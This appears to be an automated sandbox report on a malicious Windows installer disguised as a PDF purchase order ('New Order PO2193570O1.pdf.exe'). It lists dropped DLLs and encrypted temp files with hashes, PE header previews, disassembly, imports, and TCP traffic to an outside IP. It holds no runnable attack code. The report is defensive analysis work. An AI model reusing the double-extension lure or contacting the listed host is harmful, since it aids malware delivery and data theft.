                                                                                                                            • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                                            • Filename: wmuHclz87ynxvB8.exe, Detection: malicious, Browse
                                                                                                                            • Filename: Yl6482CO6U.exe, Detection: malicious, Browse
                                                                                                                            • Filename: ZmZvKByoew.exe, Detection: malicious, Browse
                                                                                                                            • Filename: WUqkYlTJ16.exe, Detection: malicious, Browse
                                                                                                                            • Filename: y3I4XEdM4V.exe, Detection: malicious, Browse
                                                                                                                            • Filename: LVh23zF9x9.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 48s9bA7Stk.exe, Detection: malicious, Browse
                                                                                                                            • Filename: pd5S1Fiscq.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 9E7YOr0kp1.exe, Detection: malicious, Browse
                                                                                                                            • Filename: IMG05773060.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 2-2.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3-1.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 2-3.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3-2.exe, Detection: malicious, Browse
                                                                                                                            • Filename: 3-3.exe, Detection: malicious, Browse
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................
                                                                                                                            C:\ProgramData\msvcp140.dll
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):440120
                                                                                                                            Entropy (8bit):6.652844702578311
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                                            MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                                            SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                                            SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                                            SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                            C:\ProgramData\nss3.dll
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1246160
                                                                                                                            Entropy (8bit):6.765536416094505
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
                                                                                                                            MD5:BFAC4E3C5908856BA17D41EDCD455A51
                                                                                                                            SHA1:8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
                                                                                                                            SHA-256:E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
                                                                                                                            SHA-512:2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                            C:\ProgramData\softokn3.dll
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):144848
                                                                                                                            Entropy (8bit):6.539750563864442
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                                                                            MD5:A2EE53DE9167BF0D6C019303B7CA84E5
                                                                                                                            SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                                                                            SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                                                                            SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                            C:\ProgramData\sqlite3.dll
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):645592
                                                                                                                            Entropy (8bit):6.50414583238337
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                            MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                            SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                            SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                            SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                            C:\ProgramData\vcruntime140.dll
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):83784
                                                                                                                            Entropy (8bit):6.890347360270656
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                                            MD5:7587BF9CB4147022CD5681B015183046
                                                                                                                            SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                                            SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                                            SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                            C:\Users\user\AppData\Local\Temp\9rrniotjam2al
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):204800
                                                                                                                            Entropy (8bit):7.999097097482449
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:3072:gF/NvbBp9hAmqtyHEc9Ob9JxKcFBabMKQcbPVuFeIC/RJVC9BhDOFt+LHh6Pq7:S/NvbbUm1kZjKgA/bP/nZCpSLW
                                                                                                                            MD5:F32CA4061A9203EDA62E37182D67A1AC
                                                                                                                            SHA1:44970B0248B4EB8B9A761D1B36740EADAA7C4AA8
                                                                                                                            SHA-256:C21D2B17DFBA306F82DE65EF312B50D1915EB947FB3DBB3E9FC2D08151D22AF5
                                                                                                                            SHA-512:D646E7920248F675D856B37547F98CE79B9BB08011C2CFC1959175D1562705D235A7938CB92B7D096979BE4B0DE3A32C0754AECDE8DC6B0A338F79454C96FD76
                                                                                                                            Malicious:false
                                                                                                                            Preview: ..(...=..&.s6zi.i.].2...q,.Y.Y.......N?..|aP..s...s....n.ol...0.......S....~.i..5...Lr%^....5&Q._.H/nyJ.....u#k:.Y...5+........;....8.....u/I*...G.....JzF.q2..9.H!. ..a...R.9u,..L<....hK.^.y......#........}..f6N..D.!7...0RPd.2.$..l.4x..........V..U....K.xxk..4....0..{..W..n.......K.9..jL9.f..(&.cB...4...O...{.....B...s..V.e.|`.`........D..|7+i..]..i.{.N..%./oX7(...7L.......}..:.>..k.L]..k.D..py7.C.[..W.....Bi.q.2;[..j.E;.@^.c...{.R...Fx...@.).<..]...W.u2....U.~....IV]......K.......-.."..o....:..L..b....(EC.p-..5......J.v.T.1|.#.......S..+.r..a.e..-..........W.:...$o.}...............=C...B..j`..B.8`.. ...Q,|.....D.8t2.)%.'....Qz.........BAd.x\.`...,...c.d....Z.+K.s.....)t|...f.a..:`..C.82...HKKS..Bq.'....f....;v.n......(....<../.T{.*...T..,.BLst.FF...'.....=.C... <.......K.h....Y..2..8...X.......... ...E.....^.C.6..`.....'.. ..Q................r...Q....~...+..8.}NcWL....wO..r.QZ87j.aK.H^+.0..@d.......q.x...L-.t.4FR....d......X3k.>S.
                                                                                                                            C:\Users\user\AppData\Local\Temp\iknev
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):56497
                                                                                                                            Entropy (8bit):4.964644123913866
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:NjvdCzgHVaZgbxq9XRkdsOAqz13RV416p:h4GVauxCXR0sXUH4sp
                                                                                                                            MD5:C131EA1B66D341DFF7FC15BD3E1B22AD
                                                                                                                            SHA1:53DF14706780CF26D2DFECBF0BE82B0BBA96B99A
                                                                                                                            SHA-256:5DEF3DF46F085C2473539EC70D51F999BA28CFF02118DA8A4E9C5382BC2FBB7D
                                                                                                                            SHA-512:29F0CD061F27BF05D07609A36E6DF69794D8F69F32E253E4F0B20C8612C9CD6DA370B6591BD650607F170E8C167CF5F4687817F63C554C6DBC3159EFDCF83CFB
                                                                                                                            Malicious:false
                                                                                                                            Preview: U......s....X.....Y.../.Z.....[.....\.....].....^....._.....`...`.a...;.b.....c.....d.....e.....f.....g...|.h.....i...}.j.....k.....l.....m...&.n.....o...].p.....q.....r...h.s.....t.....u.....v.....w.....x...0.y...h.z.....{...$.|...h.}.....~...&.........................................h...................................h.................$.....h.................h...........a.....$.....h.............................h.....9.....e.......................0.....(...........:.....:.....:.....$.....h...........&...........9.............................h...................................h.................$.....h.................h.....9.....a.....$.....h.....9.......................h.....q.............................0.....(...........:.....:.....:.....$.....h.....}.....&...........q.............................h.....}.............................h.....}
                                                                                                                            C:\Users\user\AppData\Local\Temp\nscEE2D.tmp
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):302428
                                                                                                                            Entropy (8bit):7.460796520644336
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:ox/NvbbUm1kZjKgA/bP/nZCpSLP4HuxCB0sEH4sUt:YNcm1kZjvA/rfZCQ4OxCBGHfA
                                                                                                                            MD5:E4C6374B61241AC662DEF659149448FA
                                                                                                                            SHA1:9EF90BEF72CEDFD3B8B62D534CBE0243C66CC6AC
                                                                                                                            SHA-256:91B32276103334BC6612EB12877E5C6ED7AF1CE3C5180C8615663DE1D77246DB
                                                                                                                            SHA-512:47982831FBCB6539777ECD37F024939C48DD863081C74BE776180BD0DAB4F13044F339625B03F41CE8B6B7FF1CABBA90188E1200D1C1334F11AAA234CDA29BD3
                                                                                                                            Malicious:false
                                                                                                                            Preview: .r......,........................V.......q.......r..............................................................2...........................................................................................................................................................................J...................j...............................................................................................................................p...........f...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            C:\Users\user\AppData\Local\Temp\nscEE2E.tmp\System.dll
                                                                                                                            Process:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):11776
                                                                                                                            Entropy (8bit):5.855045165595541
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                            MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                            SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                            SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                            SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                            Entropy (8bit):6.02986955238772
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:New Order PO2193570O1.pdf.exe
                                                                                                                            File size:430503
                                                                                                                            MD5:328733d92332e282737f4d92ca3b4a27
                                                                                                                            SHA1:80b6e47d3701b7f5173e87303f21fa3f9fdbf42a
                                                                                                                            SHA256:a9e2f90e66d12cacb7a8b02ea3a352a1d0fd7b9e09e4a24dfaa53932fcfcff19
                                                                                                                            SHA512:8cdbd4367d6c706635643d3fe47dfe66406a2adb57aaf74eecf346eded66d571b01d8c5ee42ba1143607a715facc8b44e8a7ab41c8855c376638b093bcc884f4
                                                                                                                            SSDEEP:6144:4svbNeGYZz0cfzdFJy6AMUF6CO5qZgf5TFUQAj3b:vbNOxFJvHUF6P6gBTFUJb
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                                            File Icon

                                                                                                                            Icon Hash:0000000000000000

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x40323c
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            sub esp, 00000180h
                                                                                                                            push ebx
                                                                                                                            push ebp
                                                                                                                            push esi
                                                                                                                            xor ebx, ebx
                                                                                                                            push edi
                                                                                                                            mov dword ptr [esp+18h], ebx
                                                                                                                            mov dword ptr [esp+10h], 00409130h
                                                                                                                            xor esi, esi
                                                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                                                            call dword ptr [00407030h]
                                                                                                                            push 00008001h
                                                                                                                            call dword ptr [004070B4h]
                                                                                                                            push ebx
                                                                                                                            call dword ptr [0040727Ch]
                                                                                                                            push 00000008h
                                                                                                                            mov dword ptr [00423F58h], eax
                                                                                                                            call 00007F278CE343BEh
                                                                                                                            mov dword ptr [00423EA4h], eax
                                                                                                                            push ebx
                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                            push 00000160h
                                                                                                                            push eax
                                                                                                                            push ebx
                                                                                                                            push 0041F458h
                                                                                                                            call dword ptr [00407158h]
                                                                                                                            push 004091B8h
                                                                                                                            push 004236A0h
                                                                                                                            call 00007F278CE34071h
                                                                                                                            call dword ptr [004070B0h]
                                                                                                                            mov edi, 00429000h
                                                                                                                            push eax
                                                                                                                            push edi
                                                                                                                            call 00007F278CE3405Fh
                                                                                                                            push ebx
                                                                                                                            call dword ptr [0040710Ch]
                                                                                                                            cmp byte ptr [00429000h], 00000022h
                                                                                                                            mov dword ptr [00423EA0h], eax
                                                                                                                            mov eax, edi
                                                                                                                            jne 00007F278CE317BCh
                                                                                                                            mov byte ptr [esp+14h], 00000022h
                                                                                                                            mov eax, 00429001h
                                                                                                                            push dword ptr [esp+14h]
                                                                                                                            push eax
                                                                                                                            call 00007F278CE33B52h
                                                                                                                            push eax
                                                                                                                            call dword ptr [0040721Ch]
                                                                                                                            mov dword ptr [esp+1Ch], eax
                                                                                                                            jmp 00007F278CE31815h
                                                                                                                            cmp cl, 00000020h
                                                                                                                            jne 00007F278CE317B8h
                                                                                                                            inc eax
                                                                                                                            cmp byte ptr [eax], 00000020h
                                                                                                                            je 00007F278CE317ACh
                                                                                                                            cmp byte ptr [eax], 00000022h
                                                                                                                            mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                            Rich Headers

                                                                                                                            Programming Language:
                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x28c80.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                            .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0x2c0000x28c800x28e00False0.0757716934251data1.15727787835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                            RT_ICON0x2c3100x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                            RT_ICON0x3cb380x94a8dataEnglishUnited States
                                                                                                                            RT_ICON0x45fe00x5488dataEnglishUnited States
                                                                                                                            RT_ICON0x4b4680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 64767, next used block 4282318848EnglishUnited States
                                                                                                                            RT_ICON0x4f6900x25a8dataEnglishUnited States
                                                                                                                            RT_ICON0x51c380x10a8dataEnglishUnited States
                                                                                                                            RT_ICON0x52ce00xbd6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                            RT_ICON0x538b80x988dataEnglishUnited States
                                                                                                                            RT_ICON0x542400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                            RT_DIALOG0x546a80x100dataEnglishUnited States
                                                                                                                            RT_DIALOG0x547a80x11cdataEnglishUnited States
                                                                                                                            RT_DIALOG0x548c80x60dataEnglishUnited States
                                                                                                                            RT_GROUP_ICON0x549280x84dataEnglishUnited States
                                                                                                                            RT_MANIFEST0x549b00x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                            SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                            ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                            Possible Origin

                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishUnited States

                                                                                                                            Network Behavior

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Jun 11, 2021 06:31:59.784060955 CEST4971580192.168.2.351.222.56.151
                                                                                                                            Jun 11, 2021 06:31:59.915463924 CEST804971551.222.56.151192.168.2.3
                                                                                                                            Jun 11, 2021 06:31:59.915854931 CEST4971580192.168.2.351.222.56.151
                                                                                                                            Jun 11, 2021 06:31:59.916834116 CEST4971580192.168.2.351.222.56.151
                                                                                                                            Jun 11, 2021 06:32:00.048165083 CEST804971551.222.56.151192.168.2.3
                                                                                                                            Jun 11, 2021 06:32:00.048552036 CEST804971551.222.56.151192.168.2.3
                                                                                                                            Jun 11, 2021 06:32:00.048616886 CEST804971551.222.56.151192.168.2.3
                                                                                                                            Jun 11, 2021 06:32:00.048695087 CEST4971580192.168.2.351.222.56.151
                                                                                                                            Jun 11, 2021 06:32:00.048742056 CEST804971551.222.56.151192.168.2.3
